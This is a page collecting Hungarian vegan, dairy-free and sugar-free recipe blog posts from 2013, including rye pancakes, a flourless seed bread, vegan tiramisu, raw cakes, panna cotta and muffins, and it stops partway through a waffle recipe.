Vegán csokoládés napraforgómagos rozs palacsinta Szeretem a kiadós palacsintás reggeliket, amelyekben nagyon ritkán van most részem. Legutoljára I. lepett meg októberben a szülinapomon palacsintával. Több receptemet kombinálva, amilyen alapanyagot talált itthon, így dobott össze nekem egy fantasztikus szülinapi reggelit. Jól sikerült nagyon! Remélem az ünnepek alatt lesz idő arra – amikor a család apraja-nagyja összegyűlik a szüleimnél -, hogy palacsintát süssünk reggelire… és nem kell már korán nekilátni az ebéd elkészítésének. Szóval azt tervezem, hogy inkább este előkészítek majd anyával egy csomó mindent (zöldségek pucolása, alapanyagok kimérése, előkészítése, stb.), hogy legyen másnap idő egy nyugodt, békés palacsintás reggelire! Ezt kívánom nektek is: nyugodt perceket a családdal, finom teát, forró csokit vagy kávét szürcsölgetve, az előző nap ajándékba kapott meleg pulcsiban ücsörögve, elmélázva, együtt nevetgélve jusson idő egymás meghallgatására. Ez egy egyszerű recept (még szeptemberben készült), háromféle lisztet kombináltam: teljeskiörlésű tönkölyt, zabot és rozslisztet. Természetesen nem kell pont ugyanezeket használni, ha éppen nincsen otthon. Kiváló lehet hajdinaliszttel, kölesliszttel vagy tönköly fehérliszttel is. Annál gazdagabb lesz, minél többféle lisztet adunk hozzá. Bevallom nekem ez volt az első próbálkozásom a rozsliszttel (tudom, nem vagyok egy nagy kenyérsütő, pedig szeretnék az lenni és ropogós héjú kovászos rozskenyeret kivenni a sütőmből alkalomadtán!), illetve egy kekszet már sütöttem belőle, az nagyon-nagyon ízlett. Amit tudni érdemes a rozslisztről, hogy vitalizáló, immunerősítő hatású, növeli a fizikai erőnlétet. Gazdag B-vitaminokban, kálciumban, magnéziumban, nitrogénben és foszforban. Alacsony sikértartalma miatt célszerű más lisztekkel keverni (forrás: Tudatos Vásárlók). A recept a Super natural every day szakácskönyvből van, változtattam egy kicsit rajta és vegánosítottam. A palacsinta tésztájába általában nem szoktam semmilyen édesítőszert tenni, szóval teljesen cukormentes. Tálaláskor úgyis meglocsoljuk juharsziruppal. Vegán csokoládés napraforgómagos rozs palacsinta Hozzávalók 10-12 db-hoz: - 1 bögre teljeskiörlésű tönkölyliszt - 1/­­2 bögre zabliszt - 1/­­2 bögre rozsliszt - 2 bögre mandulatej (szója-, rizs-, és zabtej is használható) - 2 evőkanál foszfátmentes sütőpor - 1/­­2 teáskanál só - 1/­­3 bögre kókuszolaj (kókuszzsír felolvasztva) - 1/­­2 bögre napraforgómag - 1/­­2 bögre étcsokoládé, felaprítva - juharszirup (bármilyen más szirup és méz is használható) Egy tálban keverjük össze a liszteket, a sütőport és a sót. Egy másik tálban keverjük össze a nedves hozzávalókat: mandulatej, kókuszolaj. Keverjük össze a nedves hozzávalókat a szárazhoz, adjuk hozzá a napraforgómagot és a csokoládét és jól keverjük össze, amíg sima, sűrű tésztát kapunk (ha túl sűrűnek találjuk, hígítsuk egy kevés mandulatejjel). Hagyjuk 5 percet állni, hogy a tészta megkeljen. Tegyünk egy kevés kókuszzsírt a teflonserpenyőbe és forrósítsuk fel. Kisebb adagot kanalazunk (2 adag is mehet egyszerre) a palacsinta tésztából a serpenyőbe, közepes lángon sütjük az egyik oldalukat, amíg aranybarnák lesznek. Megfordítjuk és a másik oldalukon is sütjük 1-2 percig. Tálaljuk juharsziruppal meglocsolva.

Ropogós, magvakkal teli kenyér (liszt- és élesztőmentes)

2013. november 16. Zizi kalandjai 

Ropogós, magvakkal teli kenyér (liszt- és élesztőmentes) Végre sütöttem valamit! Az utóbbi időben ilyen ritkán fordult elő! Használom a sütőt, de többnyire sütőtököt készítek. Igaz a héten megint bekapcsoltam, készítettem egy tepsi rakott sütőtököt, ami a hűtőben lévő maradékokból lett összedobva és mint mindig, az ilyen ételek a legsikeresebbek és legfinomabbak. Igaz? Ez a kenyér nem olyan, mint a többi. Ez más. Egy újfajta dimenzióba repít… elkészíteni végtelen egyszerű, a “tésztáját” összedobni kb. 2 perc, aztán igaz hagyjuk pihenni néhány órát vagy egy éjszakát, de semmi dolgunk nincsen vele, csak berakjuk a sütőbe, várunk kb. 30-40 percet és kész is a csoda. A kenyér. És, hogy miből áll? Van benne napraforgómag, mandula, lenmag, chia mag, zabpehely, egy kis juharszirup, kókuszolaj, só és egy különleges – nekem újdonságnak számító – alapanyag: útifű maghéj. Ez is egy superfood, vagyis szuper élelmiszer, sok-sok olyan tulajdonsággal, amelyek kedvezően hatnak a szervezetünkre. Elsőként említendő 85%-os (!!!) rosttartalma, amely elősegíti a bélfalon található lerakódásokat kipucolni a szervezetünkből, ha kúraszerűen fogyasztjuk. Ezenkívül csökkenti a koleszterin- és vércukorszintet, tisztítja a nyirokrendszert, enyhíti a fáradtságot, valamint segít székrekedéses panaszok esetén is. Vegetáriánus zselésítő anyagként is használható (hasonlóan a lenmaghoz és a chia maghoz) állati zselatin helyett. Még több információ erről a fantasztikus szerről itt, ahol megtalálhatjátok az is, hogy hogyan alkalmazzuk kúraszerűen (néhány recept itt, egy videó pedig itt). Ha sikerül beszereznetek ezt az alapanyagot (online vagy bio boltokban, reformboltokban keressétek) feltétlen próbáljátok ki ezt a kenyeret, ami egyébként rendkívül “elfoglalt anyuka barát” verzió. Azt hiszem, az, hogy úgy süthetünk kenyeret, hogy 2 percig tart előkészíteni, mindenképpen fontos a ma rohanó emberének. A recept Sarah-tól van, aki egy barátnőjétől tanulta. Olyan igazi skandináv, sötét, enyhén édeskés kenyér. Legközelebb én egy kicsivel több sót fogok beletenni, hogy egy picit elvegyek az édeskés ízéből. Simán sütve is kiváló, azonban pirítva, házi kesudióvajjal és anyukám cukormentes szilvalekvárjával megkenve, igazi energiabomba reggelinek számít. Ropogós magvakkal teli kenyér (liszt- és élesztőmentes) Hozzávalók: - 1 bögre napraforgómag - 1/­­2 bögre lenmag - 1/­­2 bögre mandula (vagy törökmogyoró) - 1 és 1/­­2 bögre zabpehely - 4 evőkanál útifű maghéj - 2 evőkanál chia mag - 1 teáskanál só - 1 evőkanál juharszirup - 3 evőkanál kókuszolaj (olvasztva) - 1 és 1/­­2 bögre víz (A recepthez használt bögre 250 ml-es.) Lehetőleg egy szilikon kenyérformát (például ilyet) használjunk, amelyből könnyű kifordítani a kenyeret és nem kell kikenni, kibélelni semmivel. A szilikon formában keverjük össze a száraz hozzávalókat: napraforgómag, lenmag, mandula, zabpehely, útifű maghéj, chia mag és só. Egy tálkában keverjük össze a vizet, a juharszirupot és a kókuszolajat (figyeljünk rá, hogy a víz ne legyen nagyon hideg, hogy a kókuszolaj ne kezdjen el megszilárdulni). Ezt a nedves keveréket öntsük a szilikon formába és kanállal jól keverjük el, hogy a száraz hozzávalókat mindenhol befedje a nedves keverék. Ilyenkor adhatunk még hozzá 1-2 teáskanál vizet, de egyesével adagolva, hogy tényleg nedves legyen a “kenyértészta” (nekem szükség volt még néhány teáskanálnyi vízre, hogy jól összeálljon). A kanállal szépen simítsuk, lapítsuk le a tetejét és hagyjuk a konyhapulton állni legalább 2 órát vagy egy éjszakát (én az utóbbit javaslom, ha így járunk el, akkor takarjuk le egy konyharuhával). Melegítsük elő a sütőt 175 fokra. Tegyük a szilikon formát a sütőbe, középre a rácsra. Süssük 20 percig. Ekkor vegyük ki és óvatosan, kesztyű segítségével fordítsuk ki a kenyeret a formából és fejjel lefelé tegyük vissza a sütőbe, közvetlenül a rácsra és süssük kb. 40 percig. Akkor jó, ha enyhén megütögetjük egy kanállal és üreges hangot hallunk. Várjuk meg, amíg teljesen kihűl, csak utána szeleteljük. Dobozban tárolva 4-5 napig eláll, de nem fog addig kitartani!

Mogyorós "Túrógombóc"

2013. szeptember 28. Fittanyuka Blog 

Mogyorós Ez a gombóc egy korábbi receptem újragondolva. Annyiban változott a recept, hogy nemcsak tej,-tojás,-cukormentes, hanem gluténmentes is. Nagyon finom, fogyaszthatjuk desszertként, vagy akár egy ebéd második fogásaként. A gyerekek imádni fogják:)! Hozzávalók: 150 g köles 80 g nyírfacukor 500 ml növényi tej 50 g bio margarin 1 db citrom lereszelt héja 1/­­2 citrom leve késhegynyi őrölt bourbon vanília "Morzsa": 200 g török mogyoró 3-4 evőkanál kókusz cukor 1 tk bio margarin A kölest a nyírfacukorral, vaníliával együtt puhára főzzük a növényi tejben. Ha szükséges öntünk hozzá kevés vizet, hozzákeverjük a citromlevet, citrom lereszelt héját és a margarint. Lefedjük és hagyjuk teljesen kihűlni. Én előző este elkészítem és másnap már csak gombócokat formázok belőle. A mogyorót megőröljük és a bio margarinon kissé megpirítjuk. Vizes kézzel tetszőleges nagyságú gombócokat formázunk és meghempergetjük a mogyoró "morzsában". Tálalás előtt megszórjuk a kókusz cukorral!Fittanyuka

Játék a facebook oldalon :)

2013. szeptember 5. Mindennapi ételeink 

Most érdemes lájkolni a blog facebook oldalát, mert ahogy elérjük az 1000 lájkolót, fantasztikus tej-tojás-cukormentes keksz-és sütemény ajándékcsomagot osztunk ki a 2004 Rena Kft. jóvoltából.:-) Az alábbi termékek lesznek a csomagban, amelyet Budapesten lehet átvenni személyesen, vagy vidékre a felajánló postáz:  Privolat Omlós Keksz - Mézzel  Privolat Sütemény Cseresznyés és Áfonyás töltelékkel  Santiveri Digestive Omlós Keksz Zabbal, Hozzáadott Cukor Nélkül  Santiveri Digestive Omlós Keksz Áfonyával, Hozzáadott Cukor Nélkül  Santiveri Maria Cukormentes Korpás Omlós Keksz  Santiveri Almás Korpás Omlós Házi Jellegű Teasütemény Hozzáadott Cukor Nélkül

Tiramisu: Tej,-tojás,-cukormentes,-vegán

2013. szeptember 1. Fittanyuka Blog 

Tiramisu: Tej,-tojás,-cukormentes,-vegán   A Tira mi su, olaszul annyit jelent, hogy kapj fel, valóban ez az édesség magával ragad, egyedi, finom és nagyon sokak kedvence. Viszont az eredeti receptben szereplő nyers tojás, cukor, mascarpone, több szempont miatt sem az egészséges desszert kategóriába sorolható.  Régóta tervezem elkészíteni, de mindig volt finomítani való a recepten. Az eredmény viszont nagyon jól sikerült, a piskótát is én készítettem, tehát így töviről hegyire tudom, hogy milyen alapanyagok vannak benne. Összeállt egy alacsony glikémiás indexű, tej származék és nyers tojásmentes finomság, cukor nélkül!   Hozzávalók: ( 12-14 adag)   Piskóta:   125 g világos tönkölyliszt 125 g rizsliszt vagy mandulaliszt 100 g nyírfacukor 1 tasak foszfátmentes sütőpor 1/­­2 citrom reszelt héja 6 evőkanál kókusz olaj 2,5 dl növényi tej   Krém hozzávalók:   1 zacskó vaníliás bio puding por ( Dm-est ajánlom) 80 g nyírfacukor 6 dl növényi tej 125 g bio margarin 1/­­2 citrom leve és lereszelt héja 1/­­2 kk őrölt bourbon vanília 3-4 evőkanál bio kakaópor   7 dl gabona kávé vagy lúgos kávé   A sütemény hozzávalóit összekeverjük, először a lisztet, nyírfacukrot, sütőport, majd hozzáadjuk a tejet, kókusz olajat és alaposan összedolgozzuk, majd egy szögletes ( kb. 30x20 cm) kiolajozott sütőformába öntjük a tésztát és előmelegített sütőben 180 C fokon 40-45 percig sütjük. Hagyjuk kihűlni, majd kiborítjuk a formából és baba piskóta hosszúságú, szélességű szeletekre vágjuk.   Krém elkészítése:   A krémhez a növényi tejben, szokásos módon megfőzzük a pudingot, amelyet átöntünk egy keverő tábla és robotgéppel folyamatosan keverjük, hogy ne csomósodjon össze, krémes maradjon és kicsit hűljön, közben hozzáadjuk a bio margarint, bourbon vaníliát, citromlevet és héját.  Ha betudunk szerezni vanília kivonatot attól igazán finom lesz a krémünk, 1-2 kávéskanállal adhatunk hozzá, vagy tehetünk bele 2-3 csepp rum esszenciát is. Addig kavarjuk amíg langyosra hűl. Ez itt a legmunkásabb része, de megéri:). A piskóta szeleteket egyenként belemártjuk a gabona kávéba és elkezdjük lerakni egy üvegtálba a tiramisut: egy réteg kávéba mártott piskóta sor, ráöntünk egy réteg krémet, megszórjuk kakaóporral és addig rakjuk, amíg elfogynak a hozzávalók. A végén a krémmel zárjuk és megszórjuk kakaóporral. Egy éjszakát pihentetjük a hűtőben és másnap lesz igazán finom, szeletelhető!       Fittanyuka

Kókuszos-csokis, erdei gyümölcsös nyers torta (tej-, tojás-, és cukormentes)

2013. július 22. Vegagyerek 

Kókuszos-csokis, erdei gyümölcsös nyers torta (tej-, tojás-, és cukormentes) Júniusban ünnepeltük Anyukám (63.:) születésnapját, és ahogy az már megszokott, én készítem ilyenkor a tortát neki.:) Az elmúlt években pedig, amióta már 70-90%-ban nyers ételeket fogyaszt, a torta nyers változatban készül. Idén a Facebookon találtam rá egy rendkívül mutatós tortára, amit egy costa ricai vegán séf, Eric Rivkin élő ételes szakácskönyvében találtam. Egy dél-amerikai szerzőről lévén szó, a hozzávalók egy része is a földrajzi sajátosságokat tükrözi, így kicsit kénytelen voltam variálni a recepten.  A friss kókuszdió helyett például többnyire szárított kókuszreszeléket használtam, és ettől az állaga kicsit darabosabb lett. Nem volt itthon útifűmaghéj, ezért nem sikerült elég szilárd állagúvá varázsolni a krémet, így viszonylag folyós maradt. Emiatt maradt rajta a tortaforma pereme is a fotózásnál, mert inkább kanalaztuk, mint szeleteltük.:) Az íze összhatásában viszont isteni, nagy sikert aratott családon kívül és belül, ezért mindenképpen felteszem ide a blogra! A krémjét akár kanalas-poharas édességként is lehet fogyasztani! És amilyen bonyolultnak tűnik a hosszú leírás alapján a recept, higgyétek el, nem az, nagyon egyszerű!:) De tényleg!:) Az egyes rétegek édességét én mindig kóstolással ellenőriztem, és amikor úgy ítéltem meg, hogy nem elég édes, akkor agave sziruppal utánaédesítettem. Az eredeti torta így nézett volna ki, de mivel már időhiányban voltam a végére, ezért okos módon elfelejtettem az epreket a szélére beletenni...:/­­ Mondjuk úgyis folyós lett a végeredmény, így végül nem is volt jelentősége...:D   És ha további nyers torta csodákra vágytok, ajánlom Nektek pl. Erika blogját! Kókuszos-csokis, erdei gyümölcsös nyers torta Hozzávalók (egy 20 cm-es kapcsos tortaformához): 1 bögre = kb. 250 ml A torta alap 1 bögre mandula, vagy pekándió, beáztatva 2 órára és lecsepegtetve, megszárítva 1 bögre friss, vagy szárított, finom kókuszreszelék 1/­­2 bögre magozott datolya (én kicsit be is áztattam, majd lecsöpögtettem) 1/­­2 bögre kakaópor 1/­­4 tk. őrölt fahéj csipet őrölt bors (én kihagytam) Konyhai aprítógéppel aprítsuk fel morzsás állagúra és keverjük össze a hozzávalókat. Kókuszos krémtöltelék 2 bögre aprított friss kókuszbél (nálam maradt a kókuszreszelék, amit beáztattam, és utána jól kinyomkodtam) 5 db jó érett banán 1/­­4 bögre kókuszolaj 4-5 darab magozott medjool datolya (nálam maradt a sima datolya) 1/­­2 tk. vaníliaőrlemény, vagy egy vaníliarúd kikapart belseje Turmixoljuk össze aprítógépben a hozzávalókat, amíg finom krémes állagot kapunk, majd tegyük a hűtőbe. Megjegyzés: itt a krémnél, mint utóbb kiderült sokat számított volna az útifűmaghéj hozzáadása...! Legalább 3 evőkanállal tennék hozzá, hogy ne legyen folyós a krém! A krém végleges édessége pedig függ a banántól, kóstold meg, és ha nem elég édes, esetleg agave szirupot adhatsz hozzá! Csokimáz a tetejére 1 bögre friss kókuszbél (maradt a kókuszreszelék) 3 ek. kókuszolaj 1/­­2 bögre kakaópor 3 db magozott medjool datolya 3 db fekete füge (nálam sima füge) 1/­­2 tk. vaníliaőrlemény, vagy egy vaníliarúd kikapart belseje 1/­­4 tk. őrölt fahéj  csipet őrölt bors (én kihagytam) Mixeljük össze aprítógépben a hozzávalókat, amíg egy sűrű, sima krémet nem kapunk. Tegyük be a hűtőbe. Megjegyzés: itt a kókuszreszelék miatt kicsit darabos marad a máz. Ha mégis friss kókusszal dolgozol, akkor gondolom, ez elkerülhető! Minket nem zavart, de jobb ha tudsz róla!:) Fontos!: ahhoz, hogy szilárdulás után ne csomósodjon be a kókuszolaj a mázban, közvetlenül az elkészítés után tedd be a fagyasztóba kb. 1/­­2 órára, vagy akár kevesebbre! Díszítés 1 bögre vegyes bogyós gyümölcs 1 tk. agave szirup, vagy más növényi édesítő (sztívia, juharszirup, stb.) mentalevelek (elhagyható) Az eperöntethez turmixoljuk össze a növényi édesítőt  néhány szem eperrel. Öntsük 6-8 darab nagy szemű, vékonyra szeletelt eper A torta összeállítása: 1. Nyomkodjuk a tortaalap masszáját a kókuszolajjal vékonyan kikent kapcsos tortaforma aljára. 2. Szedjük le a szárát, majd hosszában vékonyan szeleteljük fel az epreket, és a szélesebb felükkel kifelé nyomjuk a szeleteket a tortaforma pereméhez végig belül. A kisebb szeleteket felhasználhatjuk a díszítéshez. 3. Öntsük rá az alapra a kókuszos krémet. 4. Tegyük be a tortát a fagyasztóba 2 órára, hogy jól megszilárduljon! 5. Öntsük a tetejére a csokimázat, és tegyük be a hűtőbe, vagy a fagyasztóba, amíg megszilárdul! 6. Tálalás előtt tedd rá a gyümölcsöket, öntsd le az eperöntettel és díszítsd mentalevelekkel.

Tönköly - Zablisztes túrókrémmel töltött Palacsinta

2013. július 20. Fittanyuka Blog 

Tönköly - Zablisztes  túrókrémmel töltött Palacsinta Ha hétvége akkor nálunk palacsinta! Mind közül nekem ez a kedvencem: a túrókrémmel töltött, amely tej,-laktóz,-tojás,-cukormentes és könnyen emészthető. A könnyű emészthetőség titka nemcsak az értékes, rostdús lisztek miatt van, hanem a kisütéséhez nem használok hidrogenizált zsírokat, hanem a kókusz olajat amely színtelen, szagtalan, nehezebben, magasabb hőfokon ég csak és ennek köszönhetően a lakásban nem érződik a tipikus palacsintát sütünk szag. Sokan kértétek a receptet a Fittanyuka /­­ facebook oldalon, a recept pofon egyszerű: Palacsinta tészta kb: 15-20 db Hozzávalók: 300 g világos tönköly liszt 200 g zabpehely liszt 2 evőkanál folyékony stevia, vagy nyírfacukor késhegynyi szódabikarbóna 1/­­2 citrom reszelt héja 1 l víz kevés kókusz olaj a kisütéséhez A hozzávalókból palacsinta tésztát kavarunk, ha szükséges adhatunk hozzá kevés vizet és a hagyományos palacsintához  hasonlóan egyenként kisütjük őket. Túrókrém Hozzávalók: 300 g natúr tofu 3 evőkanál folyékony stevia vagy nyírfacukor 200 ml kókusz tejszín 1 kk Bourbon vanília 1 citrom reszelt héja 1/­­2 citrom leve A tofut összemorzsoljuk és botmixer segítségével a többi hozzávalóval krémesre turmixoljuk. Aki valamilyen oknál kifolyólag nem fogyaszt tofut, elkészítheti kölesből is a krémet: 100 - 150 g kölest megfőz háromszoros mennyiségű vízben, miután kihűlt  a fenti hozzávalókkal összedolgozza a kézi botmixer segítségével. A reformélelmiszer alapanyagokat a Jó egészséget! webáruházban tudja beszerezni. Fittanyuka

Panna Cotta Eperkrémmel

2013. június 23. Fittanyuka Blog 

Panna Cotta Eperkrémmel Ezzel az toszkán eredetű desszerttel térek vissza rövid szabadságom után, igazán nyárias desszert, finom, könnyű és jól behűtve tálalható! Természetesen ez a verzió teljesen megreformált:  tej,-tojás és cukormentes, a panna cotta pedig amúgy is gluténmentes.  Könnyen elkészíthető, gyors recept, a hűtési időt kell kivárni csupán. A panna cotta jelentése: Főzött tejszín, főtt tejszín... Hozzávalók: 6 kis csészével 400 ml vaníliás rizs tej 400 ml kókusztejszín 2 teáakanál agar-agar ( vagy más növényi zselésítő) 1 kk vanília őrlemény csipet himalaya só 2 evőkanál méz 1-2 evőkanál nyírfacukor ( az édesítés ízlés szerint, a méz kihagyható) Eperkrém: ( Elég tálalás előtt elkészíteni) 350 g friss eper 1 evőkanál nyírfacukor vagy méz 1/­­2 citrom leve és reszelt héja 200 ml kókusz tejszín 1 kk agar-agar vagy útifűmaghéj őrlemény A megmosott, tisztított epret a többi hozzávalóval krémesre turmixoljuk. Panna Cotta elkészítése: A kókusztejszínben elkeverjük a vaníliát, a mézet, nyírfacukrot és felmelegítjük, hogy a nyírfacukor feloldodjón.  A rizstejben pedig hidegen elkeverjük az agar-agart és állandó keverés mellett, lassú tűzön felforraljuk. Amikor elérte a forráspontot lehúzzuk a lángról és állandó keverés mellett a kókusztejszínes egyveleghez öntjük, lassú tűzön, állandó keverés mellett újra felforraljuk. Kis kávés vagy pudingos csészéket átöblítünk vízzel. Tipp: Frissen tartó fóliával is kibélelhetjük a pohárkákat, hogy biztosan kiboruljanak. Állandó keverés mellett kicsit hűtjük a masszát, majd még melegen ( nálam forró volt, de nem tűzforró), beleöntjük a pohárkákba és négy óra hosszára a hűtőszekrénybe tesszük. Desszertes tányérra borítjuk a kihűlt panna cottakat és az eperkrémmel tálaljuk. Fittanyuka

Málnás - epres krémmel töltött torta (tej- és tojásmentes!)

2013. június 8. Vegagyerek 

Málnás - epres krémmel töltött torta (tej- és tojásmentes!)  Még Húsvétkor készült ez a több szempontból is különleges torta, és mivel lassan vége az eperszezonnak, talán éppen itt az ideje, hogy végre felkerüljön ide a blogra is!:) A tortához tartozó eredeti receptet lassan 3 éve, hogy megláttam az olasz Veganblog oldalán (na, ja nem siettem el...:)))), és akkor rögtön elhatároztam, hogy már pedig én szerzek ilyen tortaformát, és megcsinálom!:) Nagy meglepetésemre nem is kellett sokat keresnem, mert az Interspar edény-osztályán meg is találtam (mostanság is láttam belőle, a bejegyzés megírásakor, 4.500 Ft körüli áron).  Ez egy olyan szuper Zenker kombinált tortaforma, ami 3 verzióban is felhasználható, tehát gyakorlatilag 3-féle tortaformát veszünk egyszerre:): Fotók: Zenker A másik újdonság ezzel a recepttel kapcsolatban az volt számomra, hogy életemben először próbáltam ki a selyem tofut. Hát, mit mondjak, igen sokat kellett rajta dolgozni, hogy eltüntessem az alapból nem kicsit keserű ízét... Az állaga viszont valóban kiváló pl. a krémsajtokat helyettesítendő receptekhez! A selyemtofut egy bioboltban vettem, és hát elég borsos volt az ára...:/­­ A torta nagyon dekoratív volt, és ízre is finom, a húsevő vendégek meglepődtek, amikor elárultam, hogy tofu van a krémben...:) A gyerekek is szívesen ették!:) Az eredeti tortareceptet több ponton is átdolgoztam a saját elképzeléseim, ízlésünk szerint, ide már így írom le. A piskóta-alapot pl. egy jól bevált recept szerint készítettem. A módosításokat akkor sajnos nem jegyeztem fel, és mivel elég sok idő telt el már azóta, bocsánat, hogy csak kb. értékek is idekerülnek!:) Málnás-epres krémmel töltött torta Hozzávalók (egy 26 cm-es tortaformához): Piskóta alap 500 ml növényi tej (nálam most rizstej) 200 g  nádcukor 1 citrom leve és héja 2 teáskanál vaníliakivonat,   vagy 2 cs. bio vaníliás cukor 500 g bio liszt (fele sima, fele teljes kiőrlésű, vagy 100% teljes kiőrlésű) 2 cs. foszfátmentes borkő sütőpor 2 mk. szódabikarbóna 12 ek. olaj Epres krém 200 g selyem tofu + citromlé, hogy elvegye a tofu keserű ízét (ha jól emlékszem, talán majdnem 1 egész citrom leve belement, de kezdd kevéssel, és folyamatosan kóstolgasd, ahogy adagolod!!) 100 g növényi tejszín agave szirup ízlés szerint (az eredeti receptben 4 ek., de nekem az elég kevés volt, utána meg csak öntöttem, nem mértem, bocsi!:) 100 g eperpüré (az epret egyszerűen összeturmixoltam egy kis vízzel) 300 g cukormentes málnalekvár (pl. a DM-ből) 2 kávéskanál agar-agar Díszítés nádporcukor (el is hagyható akár!) olvasztott étcsokoládé 20 db málna A piskótatésztához összekeverjük a tejet, a cukrot, a vaníliakivonatot, a citromlevet és az olajat, egy másik tálban pedig a lisztet, a sütőport és a szódabikarbónát, majd mind a kettő keveréket vegyítjük egymással. A tortaformát alját, oldalát jó alaposan bezsírozzuk és belisztezzük, majd 200 fokra előmelegített sütőben kb. 25 percig sütjük. Mielőtt kiszedjük a kész piskótát a tortaformából, hagyjuk kihűlni, mert különben beleszakadhat a tészta a formába! A tészta kiszedésénél esetleg egy tompa végű kést óvatosan a szélek alá csúsztathatunk, főleg a forma középső, mélyebb részére eső tortadarabnál legyünk nagyon óvatosak! Melegítsük össze a lekvárt egy kis lábasban egy kávéskanál agar-agarral, forraljuk fel és folyamatos keverés mellett, lassú tűzön főzzük kb. 1-2 percig, majd öntsük a keveréket a torta középső mélyedésébe.  Szitáljunk egy kis nádporcukrot a torta peremére. Turmixoljuk össze a selyem tofut a növényi tejszínnel, az eperpürével, az agave sziruppal és a másik kávéskanál agar-agarral. Öntsük át egy kis lábasba, forraljuk fel, és állandó keverés mellett főzzük még kb. 2 percig, utána öntsük a torta közepére. Vízgőz fölött megolvasztjuk az étcsokit, és pl. egy nylon zacskóba töltve, aminek a sarkán vágunk egy nagyon pici lyukat, kidíszítjük vele a piskóta peremét. A málnát összeturmixoljuk és ezzel a málnapürével készítjük el a málnás keretet az epres tofukrém tetején. Az olvasztott csoki befelé folyik a tortakrém felé, ezért a málnapürét utoljára öntsétek a tortára, hogy az esetleges csoki-túlfolyásokat eltakarjátok vele!:) Díszítés tetszés szerint, málnaszemekkel a tetején, és akár egy szép selyemszalaggal az oldalán, ahogy Barbara tette (nekem sajna arra már nem volt időm).

Meggyes - Márvány Muffin

2013. május 26. Fittanyuka Blog 

Meggyes - Márvány Muffin Újabb szülinap, Viktória már hat éves:)! Mivel májusi gyerek ezért szinte mindig a szülinapi zsúron a nagy kedvence az Eper a főszereplő!  Eper torta, eper fagyi volt most is repertoárban. Emellett még sütöttem meggyes, márványos muffint, amit majszolgattak és útravalónak is tettem a kis vendégeknek a torta mellett. Gyorsan elkészíthető és tej,-laktóz,-tojás,-cukormentes. Az alábbi kollázs képeken próbáltam szemléltetni a lépéseket. Először egy alap tésztát készítünk: Hozzávalók: 12 db muffin 250 g világos tönköly liszt 6 evőkanál kókusz olaj 100 g nyírfacukor 1 citrom reszelt héja 1 tasak foszfátmentes sütőpor késhegynyi bourbon vanília friss, vagy fagyasztott, magozott meggy 3-4 evőkanál bio kakaó por 400 ml víz vagy növényi tej 100 g étcsokoládé  és egy evőkanálnyi bio margarin a bevonáshoz. Először a lisztet, nyírfacukrot, sütőport, vaníliát, citrom héját összekeverjük, majd hozzáadjuk a kókusz olajat, vizet, vagy növényi tejet és robot gép segítségével alaposan összedolgozzuk. A tésztát ketté választjuk és az egyik feléhez, állandó keverés mellett hozzáadjuk a kakaó port. Muffin sütő üregeit kibéleljük muffin sütőpapírral és rétegezve kanalazzuk a tésztát: egy kanál kakaós tészta, közepébe egy meggy szem, rá egy kanál sima tészta, végén egy fogpiszkáló vagy tű segítségével összekavarjuk, márványosítjuk és előmelegített, légkeveréses sütőben 180 C fokon,  25 percig sütjük. Mielőtt kivesszük a sütőből végezzünk szúrópróbát! Miután kihűltek a muffinok, víz gőz felett a magas kakaótartalmú étcsokoládét, a bio margarinnal együtt megolvasztjuk, állandó keverés mellett és a muffinokra csorgatjuk. tetszőlegesen díszítjük. Lépések képekben: Fittanyuka

Gesztenyés köles

2013. május 7. BioBrigi 

Gesztenyés kölesNo, ez sem egy nagy bejegyzés lesz, inkább csak ötletelő, emlékeztető jellegű magamnak is. Az ember reggelenként mindig agyal, hogy mit enne, mi az ami hamar elkészül, tápláló, egészséges, és nem mindig egyenkása. Legutóbb a gesztenye jutott eszembe. Lehet kapni cukormenteset a Maronitól. Más cégről nem tudok, de lehet, hogy van. A Spárban mindig szokott lenni. Az édesítőssel az a baj, hogy aszpartamos, ez meg drága. A kölest háromszoros mennyiségű vízben megfőzzük 20 perc alatt. (1/­­4 bögre/­­fő)  Pici sót, sztíviát adunk hozzá. Esetleg vaníliával, kókuszreszelékkel és citromhéjjal ízesíthetjük. Ha egy pohár szójajoghurtot is hozzáöntünk, komplettált ételt kapunk. Finomabb, ha a végén összeturmixoljuk, de ritkán szoktam. A tetejét megszórjuk gesztenyemasszával, és friss gyümölcsökkel fogyasztjuk.

'Agyfényező golyók' aszalt gyümölcsökből, cukormentesen

2013. március 20. Vegagyerek 

'Agyfényező golyók' aszalt gyümölcsökből, cukormentesen  Megjelent egy kedves régi blogtárs, Gréta legújabb vegán szakácskönyve, mely életmód- és szakácskönyv is egyben. Igényes kivitelezésű könyvről van szó, és bár a könyvet még nem láttam, de ahogy Gréta korábbi munkáit ismerem, biztosan a tartalom is ilyen!:-) 150 egyszerű, gyors és ínycsiklandó recept, megannyi életmód-, és táplálkozási tipp, hogy kívül-belül szép, egészséges és kiegyensúlyozott legyél! A gyönyörű, igényes, színes kötet vásárlói ajándékként egy e-book kiegészítést, valamint kötetenként egy félórás személyes életmód tanácsadást kapnak ajándékba Gréta Konyhája Vegán Életmód-, és Szakácskönyv rendelhető az info@vipmedia.hu címen!  2013. március 28-án kóstolóval egybekötött könyvbemutatón vehettek részt Budapesten! Ez a recept már ebből a könyvből származik!   Agyfényező golyók: 1 bögre darált dió 1 bögre kimagozott datolya (előző este beáztatva) 1 ek karob vagy kakaópor 1tk fahéj 2 ek kókuszreszelék (opcionális) 1 ek kókuszolaj(opcionális) Egy aprítóba tesszük és és masszává darálunk. Kezünkkel golyókat formázunk Forrás: Gréta konyhája vegán szakácskönyv

Teljes kiőrlésű gofri, tej- és tojásmentes verzióban

2013. március 17. Vegagyerek 

Teljes kiőrlésű gofri, tej- és tojásmentes verzióban Vettünk egy új gofrisütőt, és mivel a családnak természetesen így gofrit kellett sütni reggelire, kitaláltam, hogy bizony teszek egy kísérletet arra, hogy 100% teljes kiőrlésű lisztből, cukormentesen is elkészítem.:-) Éééés nagyon finom lett, a férjem szerint szinte alig érezhető a különbség a sima liszteshez képest...:-) Viszont sokkal egészségesebb!:-) A recepthez a kiindulást Móni tej- és tojásmentes gofri receptje adta a lökést, és azt módosítottam tovább. Gyorsan le is írom, nehogy elfelejtsem az adagokat!:-) A 2 db gofri egyébként nagyon eltelített!:-) Az édesítés pedig minimális, utána úgyis lehet csorgatni rá agave szirupot, vagy megkenni pl. cukormentes szilvalekvárral, vagy friss gyümölcsöt karikázni rá. Teljes kiőrlésű, tej- és tojásmentes gofri Hozzávalók (2 db gofrihoz): 50 g teljes kiőrlésű liszt csipet só 1 mk. foszfátmentes borkő sütőpor (pl. DM) 